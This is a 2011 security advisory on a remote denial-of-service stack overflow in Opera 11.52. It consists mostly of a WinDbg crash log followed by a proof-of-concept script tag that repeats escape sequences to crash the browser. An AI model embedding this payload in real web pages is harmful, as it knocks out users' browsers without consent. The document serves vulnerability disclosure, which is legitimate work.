Title:
======
Opera Browser v11.52 - Stack Buffer Overflow Vulnerability
Date:
=====
2011-10-28
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=275
http://packetstormsecurity.org/files/106020/opera1152-overflow.txt
VL-ID:
=====
299
Introduction:
=============
Opera is a web browser and Internet suite developed by Opera Software with over 200 million users worldwide. The browser
handles common Internet-related tasks such as displaying web sites, sending and receiving e-mail messages, managing contacts,
chatting on IRC, downloading files via BitTorrent, and reading web feeds. Opera is offered free of charge for personal
computers and mobile phones.
Opera does not come packaged with any desktop operating system. However, it is the most popular desktop browser in some
countries, such as Ukraine. Opera Mini, which is the most popula mobile web browser as of May 2011, has been chosen as the
default integrated web browser in several mobile handsets by their respective manufacturers. Features include tabbed browsing,
page zooming, mouse gestures, and an integrated download manager. Its security features include built-in phishing and malware
protection, SSL/TLS encryption when browsing HTTPS websites, and the ability to easily[citation needed] delete private data
such as HTTP cookies.
Opera is known for originating many features later adopted by other web browsers. Opera runs on a variety of personal computer
operating systems, including Microsoft Windows, Mac OS X, Linux, and FreeBSD. Editions of Opera are available for devices using
the Maemo, BlackBerry, Symbian, Windows Mobile, Android, and iOS operating systems, as well as Java ME-enabled devices. Approximately
120 million mobile phones have been shipped with Opera. Opera is the only commercial web browser available for the Nintendo DS
and Wii gaming systems. Some television set-top boxes use Opera. Adobe Systems has licensed Opera technology for use
in the Adobe Creative Suite.
(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Opera_%28web_browser%29)
Abstract:
=========
The Vulnerability Laboratory Team discovered a Stack Buffer Overflow Vulnerability (denial of service effect) on Operas new browser v11.52
Report-Timeline:
================
2011-10-28: Public or Non-Public Disclosure
Status:
========
Published
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
A stack buffer overflow Vulnerability is detected on Operas v11.52 web browser. The bug is located on operas browser when
processing to switch between 2 different escape sequences. The vulnerability can result in a remote denial of service
application crash. Overwrite of EIP & co. is not possible!
Vulnerable Module(s):
[+] Escape sequence switch
--- Debug Logs ---
Executable search path is:
ModLoad: 01240000 01329000 C:\\Program Files (x86)\\Opera\\opera.exe
ModLoad: 77430000 775b0000 C:\\Windows\\SysWOW64\\ntdll.dll
ModLoad: 76a30000 76b40000 C:\\Windows\\syswow64\\kernel32.dll
ModLoad: 765b0000 765f6000 C:\\Windows\\syswow64\\KERNELBASE.dll
ModLoad: 74db0000 74eb0000 C:\\Windows\\syswow64\\USER32.dll
ModLoad: 75550000 755e0000 C:\\Windows\\syswow64\\GDI32.dll
... ... ... ...
ModLoad: 75040000 75075000 C:\\Windows\\syswow64\\WS2_32.dll
ModLoad: 74da0000 74da6000 C:\\Windows\\syswow64\\NSI.dll
ModLoad: 75130000 751ab000 C:\\Windows\\syswow64\\COMDLG32.dll
ModLoad: 76600000 7662d000 C:\\Windows\\system32\\Wintrust.dll
ModLoad: 767d0000 768ed000 C:\\Windows\\syswow64\\CRYPT32.dll
ModLoad: 77400000 7740c000 C:\\Windows\\syswow64\\MSASN1.dll
ModLoad: 74950000 74963000 C:\\Windows\\system32\\dwmapi.dll
ModLoad: 744f0000 744fb000 C:\\Windows\\system32\\profapi.dll
ModLoad: 6fac0000 6fac9000 C:\\Windows\\system32\\LINKINFO.dll
ModLoad: 716e0000 716e5000 C:\\Windows\\system32\\Msimg32.dll
ModLoad: 74530000 7456c000 C:\\Windows\\system32\\mswsock.dll
ModLoad: 74520000 74525000 C:\\Windows\\System32\\wshtcpip.dll
ModLoad: 73a90000 73aa0000 C:\\Windows\\system32\\NLAapi.dll
ModLoad: 73a80000 73a90000 C:\\Windows\\system32\\napinsp.dll
ModLoad: 73a50000 73a62000 C:\\Windows\\system32\\pnrpnsp.dll
ModLoad: 73a00000 73a44000 C:\\Windows\\system32\\DNSAPI.dll
ModLoad: 739f0000 739f8000 C:\\Windows\\System32\\winrnr.dll
ModLoad: 6fbf0000 6fbf6000 C:\\Windows\\System32\\wship6.dll
... ... ... ...
ModLoad: 6f280000 6f2ae000 C:\\Windows\\system32\\mlang.dll
ModLoad: 73500000 73508000 C:\\Windows\\system32\\Secur32.dll
ModLoad: 6f1a0000 6f1a8000 C:\\Windows\\system32\\credssp.dll
ModLoad: 6eaf0000 6eb2a000 C:\\Windows\\SysWOW64\\schannel.dll
ModLoad: 6fba0000 6fbec000 C:\\Windows\\system32\\apphelp.dll
ModLoad: 6fa40000 6fab0000 C:\\Windows\\system32\\ntshrui.dll
ModLoad: 74010000 74029000 C:\\Windows\\system32\\srvcli.dll
ModLoad: 71b20000 71b2b000 C:\\Windows\\system32\\cscapi.dll
ModLoad: 6fb90000 6fb9a000 C:\\Windows\\system32\\slc.dll
(b40.1110): Break instruction exception - code 80000003 (first chance)
eax=fff8e000 ebx=00000000 ecx=00000000 edx=774cf7ea esi=00000000 edi=00000000
eip=7744000c esp=07f0fab0 ebp=07f0fadc iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Windows\\SysWOW64\\ntdll.dll -
ntdll!DbgBreakPoint:
7744000c cc int 3
0:014> g
(b40.13ac): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=002f30ac ebx=003ecfe0 ecx=00000000 edx=00000006 esi=06ee42f4 edi=003ecffc
eip=68e314c5 esp=002f2fdc ebp=002f3034 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files (x86)\\Opera\\Opera.dll -
Opera_68da0000!OpSetLaunchMan+0x9024d:
68e314c5 53 push ebx
0:000> !exchain
003ee87c: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Windows\\syswow64\\USER32.dll -
USER32!VTagOutput+54 (74e2a61e)
003ee8dc: USER32!VTagOutput+54 (74e2a61e)
003efbb4: ntdll!WinSqmSetIfMaxDWORD+35 (774a1ecd)
Invalid exception stack at ffffffff
0:000> !analyze -v
FAULTING_IP:
Opera_68da0000!OpSetLaunchMan+8e058
68e2f2d0 84c0 test al,al
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 68e314c5 (Opera_68da0000!OpSetLaunchMan+0x0009024d)
ExceptionCode: c00000fd (Stack overflow)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 002f2fd8
FAULTING_THREAD: 000013ac
PROCESS_NAME: opera.exe
FAULTING_MODULE: 76a30000 kernel32
DEBUG_FLR_IMAGE_TIMESTAMP: 4e9c79de
MODULE_NAME: Opera_68da0000
ERROR_CODE: (NTSTATUS) 0xc00000fd - Eine neue Schutzseite f r den Stapel kann nicht erstellt werden.
EXCEPTION_CODE: (NTSTATUS) 0xc00000fd - Eine neue Schutzseite f r den Stapel kann nicht erstellt werden.
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 002f2fd8
DEFAULT_BUCKET_ID: STACK_OVERFLOW
RECURRING_STACK: From frames 0x4 to 0x7
PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW
BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_WRONG_SYMBOLS
LAST_CONTROL_TRANSFER: from 68e3149a to 68e314c5
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
002f3034 68e3149a 003ecffc 00000000 00000000 Opera_68da0000!OpSetLaunchMan+0x9024d
002f30b4 68e253f6 00000000 0000000a 00000000 Opera_68da0000!OpSetLaunchMan+0x90222
002f30d4 68e6ce0f 00000000 00000000 06eb418c Opera_68da0000!OpSetLaunchMan+0x8417e
002f3164 68e2f2d0 003ecfe0 00000000 00000001 Opera_68da0000!OpSetLaunchMan+0xcbb97
002f31d8 68e3c990 003ecfe0 002f329c 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f3264 68e1e98c 06adfed0 002f329c 002f32a0 Opera_68da0000!OpSetLaunchMan+0x9b718
002f3294 68e6cfc9 00002314 00000000 06eb40fc Opera_68da0000!OpSetLaunchMan+0x7d714
002f332c 68e2f2d0 003ecfe0 00000001 06eb412c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f33a0 68e3c990 003ecfe0 002f3464 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f342c 68e1e98c 06adfed0 002f3464 002f3468 Opera_68da0000!OpSetLaunchMan+0x9b718
002f345c 68e6cfc9 00002310 00000000 06eb4084 Opera_68da0000!OpSetLaunchMan+0x7d714
002f34f4 68e2f2d0 003ecfe0 00000001 06eb40b4 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f3568 68e3c990 003ecfe0 002f362c 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f35f4 68e1e98c 06adfed0 002f362c 002f3630 Opera_68da0000!OpSetLaunchMan+0x9b718
002f3624 68e6cfc9 0000230c 00000000 06eb400c Opera_68da0000!OpSetLaunchMan+0x7d714
002f36bc 68e2f2d0 003ecfe0 00000001 06eb403c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f3730 68e3c990 003ecfe0 002f37f4 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f37bc 68e1e98c 06adfed0 002f37f4 002f37f8 Opera_68da0000!OpSetLaunchMan+0x9b718
002f37ec 68e6cfc9 00002308 00000000 06eb3f94 Opera_68da0000!OpSetLaunchMan+0x7d714
002f3884 68e2f2d0 003ecfe0 00000001 06eb3fc4 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f38f8 68e3c990 003ecfe0 002f39bc 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f3984 68e1e98c 06adfed0 002f39bc 002f39c0 Opera_68da0000!OpSetLaunchMan+0x9b718
002f39b4 68e6cfc9 00002304 00000000 06eb3f1c Opera_68da0000!OpSetLaunchMan+0x7d714
002f3a4c 68e2f2d0 003ecfe0 00000001 06eb3f4c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f3ac0 68e3c990 003ecfe0 002f3b84 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f3b4c 68e1e98c 06adfed0 002f3b84 002f3b88 Opera_68da0000!OpSetLaunchMan+0x9b718
002f3b7c 68e6cfc9 00002300 00000000 06eb3d2c Opera_68da0000!OpSetLaunchMan+0x7d714
002f3c14 68e2f2d0 003ecfe0 00000001 06eb3d5c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f3c88 68e3c990 003ecfe0 002f3d4c 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f3d14 68e1e98c 06adfed0 002f3d4c 002f3d50 Opera_68da0000!OpSetLaunchMan+0x9b718
002f3d44 68e6cfc9 000022fc 00000000 06eb3cb4 Opera_68da0000!OpSetLaunchMan+0x7d714
002f3ddc 68e2f2d0 003ecfe0 00000001 06eb3ce4 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f3e50 68e3c990 003ecfe0 002f3f14 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f3edc 68e1e98c 06adfed0 002f3f14 002f3f18 Opera_68da0000!OpSetLaunchMan+0x9b718
002f3f0c 68e6cfc9 000022f8 00000000 06eb3c3c Opera_68da0000!OpSetLaunchMan+0x7d714
002f3fa4 68e2f2d0 003ecfe0 00000001 06eb3c6c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f4018 68e3c990 003ecfe0 002f40dc 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f40a4 68e1e98c 06adfed0 002f40dc 002f40e0 Opera_68da0000!OpSetLaunchMan+0x9b718
002f40d4 68e6cfc9 000022f4 00000000 06eb3bc4 Opera_68da0000!OpSetLaunchMan+0x7d714
002f416c 68e2f2d0 003ecfe0 00000001 06eb3bf4 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f41e0 68e3c990 003ecfe0 002f42a4 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f426c 68e1e98c 06adfed0 002f42a4 002f42a8 Opera_68da0000!OpSetLaunchMan+0x9b718
002f429c 68e6cfc9 000022f0 00000000 06eb3b4c Opera_68da0000!OpSetLaunchMan+0x7d714
002f4334 68e2f2d0 003ecfe0 00000001 06eb3b7c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f43a8 68e3c990 003ecfe0 002f446c 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f4434 68e1e98c 06adfed0 002f446c 002f4470 Opera_68da0000!OpSetLaunchMan+0x9b718
002f4464 68e6cfc9 000022ec 00000000 06eb3ad4 Opera_68da0000!OpSetLaunchMan+0x7d714
002f44fc 68e2f2d0 003ecfe0 00000001 06eb3b04 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f4570 68e3c990 003ecfe0 002f4634 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f45fc 68e1e98c 06adfed0 002f4634 002f4638 Opera_68da0000!OpSetLaunchMan+0x9b718
002f462c 68e6cfc9 000022e8 00000000 06eb3a5c Opera_68da0000!OpSetLaunchMan+0x7d714
002f46c4 68e2f2d0 003ecfe0 00000001 06eb3a8c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f4738 68e3c990 003ecfe0 002f47fc 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f47c4 68e1e98c 06adfed0 002f47fc 002f4800 Opera_68da0000!OpSetLaunchMan+0x9b718
002f47f4 68e6cfc9 000022e4 00000000 06eb39e4 Opera_68da0000!OpSetLaunchMan+0x7d714
002f488c 68e2f2d0 003ecfe0 00000001 06eb3a14 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f4900 68e3c990 003ecfe0 002f49c4 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f498c 68e1e98c 06adfed0 002f49c4 002f49c8 Opera_68da0000!OpSetLaunchMan+0x9b718
002f49bc 68e6cfc9 000022e0 00000000 06eb396c Opera_68da0000!OpSetLaunchMan+0x7d714
002f4a54 68e2f2d0 003ecfe0 00000001 06eb399c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f4ac8 68e3c990 003ecfe0 002f4b8c 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f4b54 68e1e98c 06adfed0 002f4b8c 002f4b90 Opera_68da0000!OpSetLaunchMan+0x9b718
002f4b84 68e6cfc9 000022dc 00000000 06eb38f4 Opera_68da0000!OpSetLaunchMan+0x7d714
002f4c1c 68e2f2d0 003ecfe0 00000001 06eb3924 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f4c90 68e3c990 003ecfe0 002f4d54 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f4d1c 68e1e98c 06adfed0 002f4d54 002f4d58 Opera_68da0000!OpSetLaunchMan+0x9b718
002f4d4c 68e6cfc9 000022d8 00000000 06eb387c Opera_68da0000!OpSetLaunchMan+0x7d714
002f4de4 68e2f2d0 003ecfe0 00000001 06eb38ac Opera_68da0000!OpSetLaunchMan+0xcbd51
002f4e58 68e3c990 003ecfe0 002f4f1c 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f4ee4 68e1e98c 06adfed0 002f4f1c 002f4f20 Opera_68da0000!OpSetLaunchMan+0x9b718
002f4f14 68e6cfc9 000022d4 00000000 06eb3804 Opera_68da0000!OpSetLaunchMan+0x7d714
002f4fac 68e2f2d0 003ecfe0 00000001 06eb3834 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f5020 68e3c990 003ecfe0 002f50e4 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f50ac 68e1e98c 06adfed0 002f50e4 002f50e8 Opera_68da0000!OpSetLaunchMan+0x9b718
002f50dc 68e6cfc9 000022d0 00000000 06eb378c Opera_68da0000!OpSetLaunchMan+0x7d714
002f5174 68e2f2d0 003ecfe0 00000001 06eb37bc Opera_68da0000!OpSetLaunchMan+0xcbd51
002f51e8 68e3c990 003ecfe0 002f52ac 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f5274 68e1e98c 06adfed0 002f52ac 002f52b0 Opera_68da0000!OpSetLaunchMan+0x9b718
002f52a4 68e6cfc9 000022cc 00000000 06eb36cc Opera_68da0000!OpSetLaunchMan+0x7d714
002f533c 68e2f2d0 003ecfe0 00000001 06eb36fc Opera_68da0000!OpSetLaunchMan+0xcbd51
002f53b0 68e3c990 003ecfe0 002f5474 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f543c 68e1e98c 06adfed0 002f5474 002f5478 Opera_68da0000!OpSetLaunchMan+0x9b718
002f546c 68e6cfc9 000022c8 00000000 06eb3654 Opera_68da0000!OpSetLaunchMan+0x7d714
002f5504 68e2f2d0 003ecfe0 00000001 06eb3684 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f5578 68e3c990 003ecfe0 002f563c 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f5604 68e1e98c 06adfed0 002f563c 002f5640 Opera_68da0000!OpSetLaunchMan+0x9b718
002f5634 68e6cfc9 000022c4 00000000 06eb35dc Opera_68da0000!OpSetLaunchMan+0x7d714
002f56cc 68e2f2d0 003ecfe0 00000001 06eb360c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f5740 68e3c990 003ecfe0 002f5804 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f57cc 68e1e98c 06adfed0 002f5804 002f5808 Opera_68da0000!OpSetLaunchMan+0x9b718
002f57fc 68e6cfc9 000022c0 00000000 06eb3564 Opera_68da0000!OpSetLaunchMan+0x7d714
002f5894 68e2f2d0 003ecfe0 00000001 06eb3594 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f5908 68e3c990 003ecfe0 002f59cc 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f5994 68e1e98c 06adfed0 002f59cc 002f59d0 Opera_68da0000!OpSetLaunchMan+0x9b718
002f59c4 68e6cfc9 000022bc 00000000 06eb34ec Opera_68da0000!OpSetLaunchMan+0x7d714
002f5a5c 68e2f2d0 003ecfe0 00000001 06eb351c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f5ad0 68e3c990 003ecfe0 002f5b94 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f5b5c 68e1e98c 06adfed0 002f5b94 002f5b98 Opera_68da0000!OpSetLaunchMan+0x9b718
002f5b8c 68e6cfc9 000022b8 00000000 06eb3474 Opera_68da0000!OpSetLaunchMan+0x7d714
002f5c24 68e2f2d0 003ecfe0 00000001 06eb34a4 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f5c98 68e3c990 003ecfe0 002f5d5c 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f5d24 68e1e98c 06adfed0 002f5d5c 002f5d60 Opera_68da0000!OpSetLaunchMan+0x9b718
002f5d54 68e6cfc9 000022b4 00000000 06eb33fc Opera_68da0000!OpSetLaunchMan+0x7d714
002f5dec 68e2f2d0 003ecfe0 00000001 06eb342c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f5e60 68e3c990 003ecfe0 002f5f24 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f5eec 68e1e98c 06adfed0 002f5f24 002f5f28 Opera_68da0000!OpSetLaunchMan+0x9b718
002f5f1c 68e6cfc9 000022b0 00000000 06eb3384 Opera_68da0000!OpSetLaunchMan+0x7d714
002f5fb4 68e2f2d0 003ecfe0 00000001 06eb33b4 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f6028 68e3c990 003ecfe0 002f60ec 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f60b4 68e1e98c 06adfed0 002f60ec 002f60f0 Opera_68da0000!OpSetLaunchMan+0x9b718
002f60e4 68e6cfc9 000022ac 00000000 06eb330c Opera_68da0000!OpSetLaunchMan+0x7d714
002f617c 68e2f2d0 003ecfe0 00000001 06eb333c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f61f0 68e3c990 003ecfe0 002f62b4 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f627c 68e1e98c 06adfed0 002f62b4 002f62b8 Opera_68da0000!OpSetLaunchMan+0x9b718
002f62ac 68e6cfc9 000022a8 00000000 06eb3294 Opera_68da0000!OpSetLaunchMan+0x7d714
002f6344 68e2f2d0 003ecfe0 00000001 06eb32c4 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f63b8 68e3c990 003ecfe0 002f647c 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f6444 68e1e98c 06adfed0 002f647c 002f6480 Opera_68da0000!OpSetLaunchMan+0x9b718
002f6474 68e6cfc9 000022a4 00000000 06eb321c Opera_68da0000!OpSetLaunchMan+0x7d714
002f650c 68e2f2d0 003ecfe0 00000001 06eb324c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f6580 68e3c990 003ecfe0 002f6644 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f660c 68e1e98c 06adfed0 002f6644 002f6648 Opera_68da0000!OpSetLaunchMan+0x9b718
002f663c 68e6cfc9 000022a0 00000000 06eb31a4 Opera_68da0000!OpSetLaunchMan+0x7d714
002f66d4 68e2f2d0 003ecfe0 00000001 06eb31d4 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f6748 68e3c990 003ecfe0 002f680c 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f67d4 68e1e98c 06adfed0 002f680c 002f6810 Opera_68da0000!OpSetLaunchMan+0x9b718
002f6804 68e6cfc9 0000229c 00000000 06eb30e4 Opera_68da0000!OpSetLaunchMan+0x7d714
002f689c 68e2f2d0 003ecfe0 00000001 06eb315c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f6910 68e3c990 003ecfe0 002f69d4 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f699c 68e1e98c 06adfed0 002f69d4 002f69d8 Opera_68da0000!OpSetLaunchMan+0x9b718
002f69cc 68e6cfc9 00002298 00000000 06eb306c Opera_68da0000!OpSetLaunchMan+0x7d714
002f6a64 68e2f2d0 003ecfe0 00000001 06eb309c Opera_68da0000!OpSetLaunchMan+0xcbd51
002f6ad8 68e3c990 003ecfe0 002f6b9c 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f6b64 68e1e98c 06adfed0 002f6b9c 002f6ba0 Opera_68da0000!OpSetLaunchMan+0x9b718
002f6b94 68e6cfc9 00002294 00000000 06eb2ff4 Opera_68da0000!OpSetLaunchMan+0x7d714
002f6c2c 68e2f2d0 003ecfe0 00000001 06eb3024 Opera_68da0000!OpSetLaunchMan+0xcbd51
002f6ca0 68e3c990 003ecfe0 002f6d64 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f6d2c 68e1e98c 06adfed0 002f6d64 002f6d68 Opera_68da0000!OpSetLaunchMan+0x9b718
002f6d5c 68e6cfc9 00002290 00000000 06eb2f7c Opera_68da0000!OpSetLaunchMan+0x7d714
002f6df4 68e2f2d0 003ecfe0 00000001 06eb2fac Opera_68da0000!OpSetLaunchMan+0xcbd51
002f6e68 68e3c990 003ecfe0 002f6f2c 00000000 Opera_68da0000!OpSetLaunchMan+0x8e058
002f6ef4 68e1e98c 06adfed0 002f6f2c 002f6f30 Opera_68da0000!OpSetLaunchMan+0x9b718
002f6f24 68e6cfc9 0000228c 00000000 06eb2f04 Opera_68da0000!OpSetLaunchMan+0x7d714
002f6fbc 68e2f2d0 003ecfe0 00000001 06eb2f34 Oper
FOLLOWUP_IP:
Opera_68da0000!OpSetLaunchMan+8e058
68e2f2d0 84c0 test al,al
SYMBOL_STACK_INDEX: 4
SYMBOL_NAME: Opera!OpSetLaunchMan+8e058
FOLLOWUP_NAME: MachineOwner
IMAGE_NAME: Opera.dll
STACK_COMMAND: ~0s ; kb
BUCKET_ID: WRONG_SYMBOLS
FAILURE_BUCKET_ID: STACK_OVERFLOW_c00000fd_Opera.dll!OpSetLaunchMan
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/opera_exe/11_52_1100_0/4e9c6c1d/Opera_dll
/11_52_1100_0/4e9c79de/c00000fd/000914c5.htm?Retriage=1
Followup: MachineOwner
---------
Picture(s):
../1.png
../2.png
Proof of Concept:
=================
The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...
PoC 1.:
<script>alert(/\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
